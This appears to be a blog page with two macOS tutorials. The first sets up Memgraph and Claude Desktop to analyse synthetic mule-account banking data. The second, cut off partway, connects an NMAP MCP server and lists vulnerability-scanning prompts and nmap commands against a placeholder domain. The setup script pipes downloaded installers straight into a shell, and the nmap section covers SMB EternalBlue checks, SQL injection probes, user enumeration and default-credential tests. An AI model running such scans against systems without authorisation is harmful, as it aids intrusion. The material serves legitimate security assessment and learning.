MacOs: Getting Started with Memgraph, Memgraph MCP and Claude Desktop by Analyzing test banking data for Mule Accounts

1. Introduction

This guide walks you through setting up Memgraph with Claude Desktop on your laptop to analyze relationships between mule accounts in banking systems. By the end of this tutorial, you’ll have a working setup where Claude can query and visualize banking transaction patterns to identify potential mule account networks.

Why Graph Databases for Fraud Detection?

Traditional relational databases store data in tables with rows and columns, which works well for structured, hierarchical data. However, fraud detection requires understanding relationships between entities—and this is where graph databases excel.

In fraud investigation, the connections matter more than the entities themselves:

  • Follow the money: Tracing funds through multiple accounts requires traversing relationships, not joining tables
  • Multi-hop queries: Finding patterns like “accounts connected within 3 transactions” is natural in graphs but complex in SQL
  • Pattern matching: Detecting suspicious structures (like a controller account distributing to multiple mules) is intuitive with graph queries
  • Real-time analysis: Graph databases can quickly identify new connections as transactions occur

Mule account schemes specifically benefit from graph analysis because they form distinct network patterns:

  • A central controller account receives large deposits
  • Funds are rapidly distributed to multiple recruited “mule” accounts
  • Mules quickly withdraw cash or transfer funds, completing the laundering cycle
  • These patterns create a recognizable “hub-and-spoke” topology in a graph

In a traditional relational database, finding these patterns requires multiple complex JOINs and recursive queries. In a graph database, you simply ask: “show me accounts connected to this one” or “find all paths between these two accounts.”

Why This Stack?

We’ve chosen a powerful combination of technologies that work seamlessly together:

Memgraph (Graph Database)

  • Native graph database built for speed and real-time analytics
  • Uses Cypher query language (intuitive, SQL-like syntax for graphs)
  • In-memory architecture provides millisecond query responses
  • Perfect for fraud detection where you need to explore relationships quickly
  • Lightweight and runs easily in Docker on your laptop
  • Open-source with excellent tooling (Memgraph Lab for visualization)

Claude Desktop (AI Interface)

  • Natural language interface eliminates the need to learn Cypher query syntax
  • Ask questions in plain English: “Which accounts received money from ACC006?”
  • Claude translates your questions into optimized graph queries automatically
  • Provides explanations and insights alongside query results
  • Dramatically lowers the barrier to entry for graph analysis

MCP (Model Context Protocol)

  • Connects Claude directly to Memgraph
  • Enables Claude to execute queries and retrieve real-time data
  • Secure, local connection—your data never leaves your machine
  • Extensible architecture allows adding other tools and databases

Why Not PostgreSQL?

While PostgreSQL is excellent for transactional data storage, graph relationships in SQL require:

  • Complex recursive CTEs (Common Table Expressions) for multi-hop queries
  • Multiple JOINs that become exponentially slower as relationships deepen
  • Manual construction of relationship paths
  • Limited visualization capabilities for network structures

Memgraph’s native graph model represents accounts and transactions as nodes and edges, making relationship queries natural and performant. For fraud detection where you need to quickly explore “who’s connected to whom,” graph databases are the right tool.

What You’ll Build

By following this guide, you’ll create:

The ability to ask natural language questions and get instant graph insights

A local Memgraph database with 57 accounts and 512 transactions

A realistic mule account network hidden among legitimate transactions

An AI-powered analysis interface through Claude Desktop

2. Prerequisites

Before starting, ensure you have:

  • macOS laptop
  • Homebrew package manager (we’ll install if needed)
  • Claude Desktop app installed
  • Basic terminal knowledge

3. Automated Setup

Below is a massive script. I did have it as single scripts, but it has merged into a large hazardous blob of bash. This script is badged under the “it works on my laptop” disclaimer!

cat > ~/setup_memgraph_complete.sh << 'EOF'
#!/bin/bash

# Complete automated setup for Memgraph + Claude Desktop

echo "========================================"
echo "Memgraph + Claude Desktop Setup"
echo "========================================"
echo ""

# Step 1: Install Rancher Desktop
echo "Step 1/7: Installing Rancher Desktop..."

# Check if Docker daemon is already running
DOCKER_RUNNING=false
if command -v docker &> /dev/null && docker info &> /dev/null 2>&1; then
    echo "Container runtime is already running!"
    DOCKER_RUNNING=true
fi

if [ "$DOCKER_RUNNING" = false ]; then
    # Check if Homebrew is installed
    if ! command -v brew &> /dev/null; then
        echo "Installing Homebrew first..."
        /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
        
        # Add Homebrew to PATH for Apple Silicon Macs
        if [[ $(uname -m) == 'arm64' ]]; then
            echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile
            eval "$(/opt/homebrew/bin/brew shellenv)"
        fi
    fi
    
    # Check if Rancher Desktop is installed
    RANCHER_INSTALLED=false
    if brew list --cask rancher 2>/dev/null | grep -q rancher; then
        RANCHER_INSTALLED=true
        echo "Rancher Desktop is installed via Homebrew."
    fi
    
    # If not installed, install it
    if [ "$RANCHER_INSTALLED" = false ]; then
        echo "Installing Rancher Desktop..."
        brew install --cask rancher
        sleep 3
    fi
    
    echo "Starting Rancher Desktop..."
    
    # Launch Rancher Desktop
    if [ -d "/Applications/Rancher Desktop.app" ]; then
        echo "Launching Rancher Desktop from /Applications..."
        open "/Applications/Rancher Desktop.app"
        sleep 5
    else
        echo ""
        echo "Please launch Rancher Desktop manually:"
        echo "  1. Press Cmd+Space"
        echo "  2. Type 'Rancher Desktop'"
        echo "  3. Press Enter"
        echo ""
        echo "Waiting for you to launch Rancher Desktop..."
        echo "Press Enter once you've started Rancher Desktop"
        read
    fi
    
    # Add Rancher Desktop to PATH
    export PATH="$HOME/.rd/bin:$PATH"
    
    echo "Waiting for container runtime to start (this may take 30-60 seconds)..."
    # Wait for docker command to become available
    for i in {1..60}; do
        if command -v docker &> /dev/null && docker info &> /dev/null 2>&1; then
            echo ""
            echo "Container runtime is running!"
            break
        fi
        echo -n "."
        sleep 3
    done
    
    if ! command -v docker &> /dev/null || ! docker info &> /dev/null 2>&1; then
        echo ""
        echo "Rancher Desktop is taking longer than expected. Please:"
        echo "1. Wait for Rancher Desktop to fully initialize"
        echo "2. Accept any permissions requests"
        echo "3. Once you see 'Kubernetes is running' in Rancher Desktop, press Enter"
        read
        
        # Try to add Rancher Desktop to PATH
        export PATH="$HOME/.rd/bin:$PATH"
        
        # Check one more time
        if ! command -v docker &> /dev/null || ! docker info &> /dev/null 2>&1; then
            echo "Container runtime still not responding."
            echo "Please ensure Rancher Desktop is fully started and try again."
            exit 1
        fi
    fi
fi

# Ensure docker is in PATH for the rest of the script
export PATH="$HOME/.rd/bin:$PATH"

echo ""
echo "Step 2/7: Installing Memgraph container..."

# Stop and remove existing container if it exists
if docker ps -a 2>/dev/null | grep -q memgraph; then
    echo "Removing existing Memgraph container..."
    docker stop memgraph 2>/dev/null || true
    docker rm memgraph 2>/dev/null || true
fi

docker pull memgraph/memgraph-platform || { echo "Failed to pull Memgraph image"; exit 1; }
docker run -d -p 7687:7687 -p 7444:7444 -p 3000:3000 \
  --name memgraph \
  -v memgraph_data:/var/lib/memgraph \
  memgraph/memgraph-platform || { echo "Failed to start Memgraph container"; exit 1; }

echo "Waiting for Memgraph to be ready..."
sleep 10

echo ""
echo "Step 3/7: Installing Python and Memgraph MCP server..."

# Install Python if not present
if ! command -v python3 &> /dev/null; then
    echo "Installing Python..."
    brew install python3
fi

# Install uv package manager
if ! command -v uv &> /dev/null; then
    echo "Installing uv package manager..."
    curl -LsSf https://astral.sh/uv/install.sh | sh
    export PATH="$HOME/.local/bin:$PATH"
fi

echo "Memgraph MCP will be configured to run via uv..."

echo ""
echo "Step 4/7: Configuring Claude Desktop..."

CONFIG_DIR="$HOME/Library/Application Support/Claude"
CONFIG_FILE="$CONFIG_DIR/claude_desktop_config.json"

mkdir -p "$CONFIG_DIR"

if [ -f "$CONFIG_FILE" ] && [ -s "$CONFIG_FILE" ]; then
    echo "Backing up existing Claude configuration..."
    cp "$CONFIG_FILE" "$CONFIG_FILE.backup.$(date +%s)"
fi

# Get the full path to uv
UV_PATH=$(which uv 2>/dev/null || echo "$HOME/.local/bin/uv")

# Merge memgraph config with existing config
if [ -f "$CONFIG_FILE" ] && [ -s "$CONFIG_FILE" ]; then
    echo "Merging memgraph config with existing MCP servers..."
    
    # Use Python to merge JSON (more reliable than jq which may not be installed)
    python3 << PYTHON_MERGE
import json
import sys

config_file = "$CONFIG_FILE"
uv_path = "${UV_PATH}"

try:
    # Read existing config
    with open(config_file, 'r') as f:
        config = json.load(f)
    
    # Ensure mcpServers exists
    if 'mcpServers' not in config:
        config['mcpServers'] = {}
    
    # Add/update memgraph server
    config['mcpServers']['memgraph'] = {
        "command": uv_path,
        "args": [
            "run",
            "--with",
            "mcp-memgraph",
            "--python",
            "3.13",
            "mcp-memgraph"
        ],
        "env": {
            "MEMGRAPH_HOST": "localhost",
            "MEMGRAPH_PORT": "7687"
        }
    }
    
    # Write merged config
    with open(config_file, 'w') as f:
        json.dump(config, f, indent=2)
    
    print("Successfully merged memgraph config")
    sys.exit(0)
except Exception as e:
    print(f"Error merging config: {e}", file=sys.stderr)
    sys.exit(1)
PYTHON_MERGE
    
    if [ $? -ne 0 ]; then
        echo "Failed to merge config, creating new one..."
        cat > "$CONFIG_FILE" << JSON
{
  "mcpServers": {
    "memgraph": {
      "command": "${UV_PATH}",
      "args": [
        "run",
        "--with",
        "mcp-memgraph",
        "--python",
        "3.13",
        "mcp-memgraph"
      ],
      "env": {
        "MEMGRAPH_HOST": "localhost",
        "MEMGRAPH_PORT": "7687"
      }
    }
  }
}
JSON
    fi
else
    echo "Creating new Claude Desktop configuration..."
    cat > "$CONFIG_FILE" << JSON
{
  "mcpServers": {
    "memgraph": {
      "command": "${UV_PATH}",
      "args": [
        "run",
        "--with",
        "mcp-memgraph",
        "--python",
        "3.13",
        "mcp-memgraph"
      ],
      "env": {
        "MEMGRAPH_HOST": "localhost",
        "MEMGRAPH_PORT": "7687"
      }
    }
  }
}
JSON
fi

echo "Claude Desktop configured!"

echo ""
echo "Step 5/7: Setting up mgconsole..."
echo "mgconsole will be used via Docker (included in memgraph/memgraph-platform)"

echo ""
echo "Step 6/7: Setting up database schema..."

sleep 5  # Give Memgraph extra time to be ready

echo "Clearing existing data..."
echo "MATCH (n) DETACH DELETE n;" | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687

echo "Creating indexes..."
cat <<'CYPHER' | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687
CREATE INDEX ON :Account(account_id);
CREATE INDEX ON :Account(account_type);
CREATE INDEX ON :Person(person_id);
CYPHER

echo ""
echo "Step 7/7: Populating test data..."

echo "Loading core mule account data..."
cat <<'CYPHER' | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687
CREATE (p1:Person {person_id: 'P001', name: 'John Smith', age: 45, risk_score: 'low'})
CREATE (a1:Account {account_id: 'ACC001', account_type: 'checking', balance: 15000, opened_date: '2020-01-15', status: 'active'})
CREATE (p1)-[:OWNS {since: '2020-01-15'}]->(a1)
CREATE (p2:Person {person_id: 'P002', name: 'Sarah Johnson', age: 38, risk_score: 'low'})
CREATE (a2:Account {account_id: 'ACC002', account_type: 'savings', balance: 25000, opened_date: '2019-06-10', status: 'active'})
CREATE (p2)-[:OWNS {since: '2019-06-10'}]->(a2)
CREATE (p3:Person {person_id: 'P003', name: 'Michael Brown', age: 22, risk_score: 'high'})
CREATE (a3:Account {account_id: 'ACC003', account_type: 'checking', balance: 500, opened_date: '2024-08-01', status: 'active'})
CREATE (p3)-[:OWNS {since: '2024-08-01'}]->(a3)
CREATE (p4:Person {person_id: 'P004', name: 'Lisa Chen', age: 19, risk_score: 'high'})
CREATE (a4:Account {account_id: 'ACC004', account_type: 'checking', balance: 300, opened_date: '2024-08-05', status: 'active'})
CREATE (p4)-[:OWNS {since: '2024-08-05'}]->(a4)
CREATE (p5:Person {person_id: 'P005', name: 'David Martinez', age: 21, risk_score: 'high'})
CREATE (a5:Account {account_id: 'ACC005', account_type: 'checking', balance: 450, opened_date: '2024-08-03', status: 'active'})
CREATE (p5)-[:OWNS {since: '2024-08-03'}]->(a5)
CREATE (p6:Person {person_id: 'P006', name: 'Robert Wilson', age: 35, risk_score: 'critical'})
CREATE (a6:Account {account_id: 'ACC006', account_type: 'business', balance: 2000, opened_date: '2024-07-15', status: 'active'})
CREATE (p6)-[:OWNS {since: '2024-07-15'}]->(a6)
CREATE (p7:Person {person_id: 'P007', name: 'Unknown Entity', risk_score: 'critical'})
CREATE (a7:Account {account_id: 'ACC007', account_type: 'business', balance: 150000, opened_date: '2024-06-01', status: 'active'})
CREATE (p7)-[:OWNS {since: '2024-06-01'}]->(a7)
CREATE (a7)-[:TRANSACTION {transaction_id: 'TXN001', amount: 50000, timestamp: '2024-09-01T10:15:00', type: 'wire_transfer', flagged: true}]->(a6)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN002', amount: 9500, timestamp: '2024-09-01T14:30:00', type: 'transfer', flagged: true}]->(a3)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN003', amount: 9500, timestamp: '2024-09-01T14:32:00', type: 'transfer', flagged: true}]->(a4)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN004', amount: 9500, timestamp: '2024-09-01T14:35:00', type: 'transfer', flagged: true}]->(a5)
CREATE (a3)-[:TRANSACTION {transaction_id: 'TXN005', amount: 9000, timestamp: '2024-09-02T09:00:00', type: 'cash_withdrawal', flagged: true}]->(a6)
CREATE (a4)-[:TRANSACTION {transaction_id: 'TXN006', amount: 9000, timestamp: '2024-09-02T09:15:00', type: 'cash_withdrawal', flagged: true}]->(a6)
CREATE (a5)-[:TRANSACTION {transaction_id: 'TXN007', amount: 9000, timestamp: '2024-09-02T09:30:00', type: 'cash_withdrawal', flagged: true}]->(a6)
CREATE (a7)-[:TRANSACTION {transaction_id: 'TXN008', amount: 45000, timestamp: '2024-09-15T11:20:00', type: 'wire_transfer', flagged: true}]->(a6)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN009', amount: 9800, timestamp: '2024-09-15T15:00:00', type: 'transfer', flagged: true}]->(a3)
CREATE (a6)-[:TRANSACTION {transaction_id: 'TXN010', amount: 9800, timestamp: '2024-09-15T15:05:00', type: 'transfer', flagged: true}]->(a4)
CREATE (a1)-[:TRANSACTION {transaction_id: 'TXN011', amount: 150, timestamp: '2024-09-10T12:00:00', type: 'debit_card', flagged: false}]->(a2)
CREATE (a2)-[:TRANSACTION {transaction_id: 'TXN012', amount: 1000, timestamp: '2024-09-12T10:00:00', type: 'transfer', flagged: false}]->(a1);
CYPHER

echo "Loading noise data (50 accounts, 500 transactions)..."
cat <<'CYPHER' | docker exec -i memgraph mgconsole --host 127.0.0.1 --port 7687
UNWIND range(1, 50) AS i
WITH i,
     ['Alice', 'Bob', 'Carol', 'David', 'Emma', 'Frank', 'Grace', 'Henry', 'Iris', 'Jack',
      'Karen', 'Leo', 'Mary', 'Nathan', 'Olivia', 'Peter', 'Quinn', 'Rachel', 'Steve', 'Tina',
      'Uma', 'Victor', 'Wendy', 'Xavier', 'Yara', 'Zack', 'Amy', 'Ben', 'Chloe', 'Daniel',
      'Eva', 'Fred', 'Gina', 'Hugo', 'Ivy', 'James', 'Kate', 'Luke', 'Mia', 'Noah',
      'Opal', 'Paul', 'Rosa', 'Sam', 'Tara', 'Umar', 'Vera', 'Will', 'Xena', 'Yuki'] AS firstNames,
     ['Anderson', 'Baker', 'Clark', 'Davis', 'Evans', 'Foster', 'Garcia', 'Harris', 'Irwin', 'Jones',
      'King', 'Lopez', 'Miller', 'Nelson', 'Owens', 'Parker', 'Quinn', 'Reed', 'Scott', 'Taylor',
      'Underwood', 'Vargas', 'White', 'Young', 'Zhao', 'Adams', 'Brooks', 'Collins', 'Duncan', 'Ellis'] AS lastNames,
     ['checking', 'savings', 'checking', 'savings', 'checking'] AS accountTypes,
     ['low', 'low', 'low', 'medium', 'low'] AS riskScores,
     ['2018-03-15', '2018-07-22', '2019-01-10', '2019-05-18', '2019-09-30', '2020-02-14', '2020-06-25', '2020-11-08', '2021-04-17', '2021-08-29', '2022-01-20', '2022-05-12', '2022-10-03', '2023-02-28', '2023-07-15'] AS dates
WITH i,
     firstNames[toInteger(rand() * size(firstNames))] + ' ' + lastNames[toInteger(rand() * size(lastNames))] AS fullName,
     accountTypes[toInteger(rand() * size(accountTypes))] AS accType,
     riskScores[toInteger(rand() * size(riskScores))] AS risk,
     toInteger(rand() * 40 + 25) AS age,
     toInteger(rand() * 80000 + 1000) AS balance,
     dates[toInteger(rand() * size(dates))] AS openDate
CREATE (p:Person {person_id: 'NOISE_P' + toString(i), name: fullName, age: age, risk_score: risk})
CREATE (a:Account {account_id: 'NOISE_ACC' + toString(i), account_type: accType, balance: balance, opened_date: openDate, status: 'active'})
CREATE (p)-[:OWNS {since: openDate}]->(a);
UNWIND range(1, 500) AS i
WITH i,
     toInteger(rand() * 50 + 1) AS fromIdx,
     toInteger(rand() * 50 + 1) AS toIdx,
     ['transfer', 'debit_card', 'check', 'atm_withdrawal', 'direct_deposit', 'wire_transfer', 'mobile_payment'] AS txnTypes,
     ['2024-01-15', '2024-02-20', '2024-03-10', '2024-04-05', '2024-05-18', '2024-06-22', '2024-07-14', '2024-08-09', '2024-09-25', '2024-10-30'] AS dates
WHERE fromIdx <> toIdx
WITH i, fromIdx, toIdx, txnTypes, dates,
     txnTypes[toInteger(rand() * size(txnTypes))] AS txnType,
     toInteger(rand() * 5000 + 10) AS amount,
     (rand() < 0.05) AS shouldFlag,
     dates[toInteger(rand() * size(dates))] AS txnDate
MATCH (from:Account {account_id: 'NOISE_ACC' + toString(fromIdx)})
MATCH (to:Account {account_id: 'NOISE_ACC' + toString(toIdx)})
CREATE (from)-[:TRANSACTION {
    transaction_id: 'NOISE_TXN' + toString(i),
    amount: amount,
    timestamp: txnDate + 'T' + toString(toInteger(rand() * 24)) + ':' + toString(toInteger(rand() * 60)) + ':00',
    type: txnType,
    flagged: shouldFlag
}]->(to);
CYPHER

echo ""
echo "========================================"
echo "Setup Complete!"
echo "========================================"
echo ""
echo "Next steps:"
echo "1. Restart Claude Desktop (Quit and reopen)"
echo "2. Open Memgraph Lab at http://localhost:3000"
echo "3. Start asking Claude questions about the mule account data!"
echo ""
echo "Example query: 'Show me all accounts owned by people with high or critical risk scores in Memgraph'"
echo ""

EOF

chmod +x ~/setup_memgraph_complete.sh
~/setup_memgraph_complete.sh

The script will:

  1. Install Rancher Desktop (if not already installed)
  2. Install Homebrew (if needed)
  3. Pull and start Memgraph container
  4. Install Node.js and Memgraph MCP server
  5. Configure Claude Desktop automatically
  6. Install mgconsole CLI tool
  7. Set up database schema with indexes
  8. Populate with mule account data and 500+ noise transactions

After the script completes, restart Claude Desktop (quit and reopen) for the MCP configuration to take effect.

4. Verifying the Setup

Verify the setup by accessing Memgraph Lab at http://localhost:3000 or using mgconsole via Docker:

docker exec -it memgraph mgconsole --host 127.0.0.1 --port 7687

In mgconsole, run:

MATCH (n) RETURN count(n);

You should see:

+----------+
| count(n) |
+----------+
| 152      |
+----------+
1 row in set (round trip in 0.002 sec)

Check the transaction relationships:

MATCH ()-[r:TRANSACTION]->() RETURN count(r);

You should see:

+----------+
| count(r) |
+----------+
| 501      |
+----------+
1 row in set (round trip in 0.002 sec)

Verify the mule accounts are still identifiable:

MATCH (p:Person)-[:OWNS]->(a:Account)
WHERE p.risk_score IN ['high', 'critical']
RETURN p.name, a.account_id, p.risk_score
ORDER BY p.risk_score DESC;

This should return the 5 suspicious accounts from our mule network:

+------------------+------------------+------------------+
| p.name           | a.account_id     | p.risk_score     |
+------------------+------------------+------------------+
| "Michael Brown"  | "ACC003"         | "high"           |
| "Lisa Chen"      | "ACC004"         | "high"           |
| "David Martinez" | "ACC005"         | "high"           |
| "Robert Wilson"  | "ACC006"         | "critical"       |
| "Unknown Entity" | "ACC007"         | "critical"       |
+------------------+------------------+------------------+
5 rows in set (round trip in 0.002 sec)

5. Using Claude with Memgraph

Now that everything is set up, you can interact with Claude Desktop to analyze the mule account network. Here are example queries you can try:

Example 1: Find All High-Risk Accounts

Ask Claude:

Show me all accounts owned by people with high or critical risk scores in Memgraph

Claude will query Memgraph and return results showing the suspicious accounts (ACC003, ACC004, ACC005, ACC006, ACC007), filtering out the 50+ noise accounts.

Example 2: Identify Transaction Patterns

Ask Claude:

Find all accounts that received money from ACC006 within a 24-hour period. Show the transaction amounts and timestamps.

Claude will identify the three mule accounts (ACC003, ACC004, ACC005) that received similar amounts in quick succession.

Example 3: Trace Money Flow

Ask Claude:

Trace the flow of money from ACC007 through the network. Show me the complete transaction path.

Claude will visualize the path: ACC007 -> ACC006 -> [ACC003, ACC004, ACC005], revealing the laundering pattern.

Example 4: Calculate Total Funds

Ask Claude:

Calculate the total amount of money that flowed through ACC006 in September 2024

Claude will aggregate all incoming and outgoing transactions for the controller account.

Example 5: Find Rapid Withdrawal Patterns

Ask Claude:

Find accounts where money was withdrawn within 48 hours of being deposited. What are the amounts and account holders?

This reveals the classic mule account behavior of quick cash extraction.

Example 6: Network Analysis

Ask Claude:

Show me all accounts that have transaction relationships with ACC006. Create a visualization of this network.

Claude will generate a graph showing the controller account at the center with connections to both the source and mule accounts.

Example 7: Risk Assessment

Ask Claude:

Which accounts have received flagged transactions totaling more than $15,000? List them by total amount.

This helps identify which mule accounts have processed the most illicit funds.

6. Understanding the Graph Visualization

When Claude displays graph results, you’ll see:

  • Nodes: Circles representing accounts and persons
  • Edges: Lines representing transactions or ownership relationships
  • Properties: Attributes like amounts, timestamps, and risk scores

The graph structure makes it easy to spot:

  • Central nodes (controllers) with many connections
  • Similar transaction patterns across multiple accounts
  • Timing correlations between related transactions
  • Isolation of legitimate vs. suspicious account clusters

7. Advanced Analysis Queries

Once you’re comfortable with basic queries, try these advanced analyses:

Community Detection

Ask Claude:

Find groups of accounts that frequently transact with each other. Are there separate communities in the network?

Temporal Analysis

Ask Claude:

Show me the timeline of transactions for accounts owned by people under 25 years old. Are there any patterns?

Shortest Path Analysis

Ask Claude:

What's the shortest path of transactions between ACC007 and ACC003? How many hops does it take?

8. Cleaning Up

When you’re done experimenting, you can stop and remove the Memgraph container:

docker stop memgraph
docker rm memgraph

To remove the data volume completely:

docker volume rm memgraph_data

To restart later with fresh data, just run the setup script again.

9. Troubleshooting

Docker Not Running

If you get errors about Docker not running:

open -a Docker

Wait for Docker Desktop to start, then verify:

docker info

Memgraph Container Won’t Start

Check if ports are already in use:

lsof -i :7687
lsof -i :3000

Kill any conflicting processes or change the port mappings in the docker run command.

Claude Can’t Connect to Memgraph

Verify the MCP server configuration:

cat ~/Library/Application\ Support/Claude/claude_desktop_config.json

Ensure Memgraph is running:

docker ps | grep memgraph

Restart Claude Desktop completely after configuration changes.

mgconsole Command Not Found

Install it manually:

brew install memgraph/tap/mgconsole

No Data Returned from Queries

Check if data was loaded successfully:

mgconsole --host 127.0.0.1 --port 7687 -e "MATCH (n) RETURN count(n);"

If the count is 0, rerun the setup script.

10. Next Steps

Now that you have a working setup, you can:

  • Add more complex transaction patterns
  • Implement real-time fraud detection rules
  • Create additional graph algorithms for anomaly detection
  • Connect to real banking data sources (with proper security)
  • Build automated alerting for suspicious patterns
  • Expand the schema to include IP addresses, devices, and locations

The combination of Memgraph’s graph database capabilities and Claude’s natural language interface makes it easy to explore and analyze complex relationship data without writing complex Cypher queries manually.

11. Conclusion

You now have a complete environment for analyzing banking mule accounts using Memgraph and Claude Desktop. The graph database structure naturally represents the relationships between accounts, making it ideal for fraud detection. Claude’s integration through MCP allows you to query and visualize this data using natural language, making sophisticated analysis accessible without deep technical knowledge.

The test dataset demonstrates typical mule account patterns: rapid movement of funds through multiple accounts, young account holders, recently opened accounts, and structured amounts designed to avoid reporting thresholds. These patterns are much easier to spot in a graph database than in traditional relational databases.

Experiment with different queries and explore how graph thinking can reveal hidden patterns in connected data.

MacOs: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

⚠️ Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation

On Linux (Ubuntu/Debian):

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

Mac OS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

The most popular NMAP MCP server is available on GitHub. We’ll install it globally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
config = json.load(f)

if 'mcpServers' not in config:
config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
"command": "node",
"args": [
f"/Users/{username}/nmap-mcp-server/dist/index.js"
],
"env": {}
}

with open(config_file, 'w') as f:
json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

